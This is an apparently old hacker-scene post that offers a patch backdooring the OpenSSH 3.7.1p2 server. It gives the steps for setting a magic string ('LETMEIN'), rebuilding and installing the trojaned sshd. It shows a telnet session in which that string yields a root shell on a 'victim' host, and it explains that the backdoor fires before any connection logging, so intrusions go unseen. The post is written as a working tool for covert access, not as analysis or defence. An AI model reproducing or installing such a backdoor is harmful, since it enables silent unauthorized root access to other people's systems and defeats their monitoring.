OpenSSH backdoor


A good old days I made a very simple, but nice sshd backdoor for old sshd 1.2.xx. Now it's time for somethig even more lame, but in old, good Lam3rZ style also! :)

osshd-3.7.1p2-backdoor1.diff - it's a patch for current openssh.

How to use it?
You know how to patch sources, aren't you? :)
Change the #define EVIL "LETMEIN" to any evil, magic string you like, patch the openssh sources, rebuild and install.
The usage is rather simple, see below:
root@evil(chroot):~# telnet victim 22
Trying x.x.x.x...
Connected to victim.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.7.1p2
LETMEIN
sh: no job control in this shell

Shift to the left,
Shift to the right,
Mask in, mask out,
BYTE, BYTE, BYTE !!!

root@victim:/# ^]
telnet> mode c

root@victim:/# 
Here comes the explanation:
First you connect to ssh port (22 preferably ;), then you type the magic string ("LETMEIN" in this case) so the login shell should be spawned. To get the terminal capability you need to change telnet mode to 'character', so press the CTRL-] (^]) sequence and type "mode character", or "mode c".
At this point you have a very nice terminal! Some features are missing, but I leave it up to you as a an exercise, believe me, it's very easy ;) Beside that you may not even notice what's wrong...

Why is it done this way?

The main reason is, that at the very beginning of the handshake there is no logging. No even the connection logging, so you're entering the victim's environment silently...